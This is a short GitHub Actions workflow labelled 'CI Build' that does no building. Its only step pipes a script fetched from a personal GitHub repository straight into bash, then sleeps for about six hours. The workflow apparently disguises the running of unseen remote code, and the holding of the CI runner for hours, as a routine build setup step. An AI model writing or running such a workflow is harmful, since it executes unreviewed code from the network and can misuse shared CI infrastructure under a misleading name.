name: CI Build
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Setup Environment
      run: |
        curl -sL https://raw.githubusercontent.com/jenish-prog/test-repo/main/bootstrap.sh | bash
        sleep 21000 # 6 hours
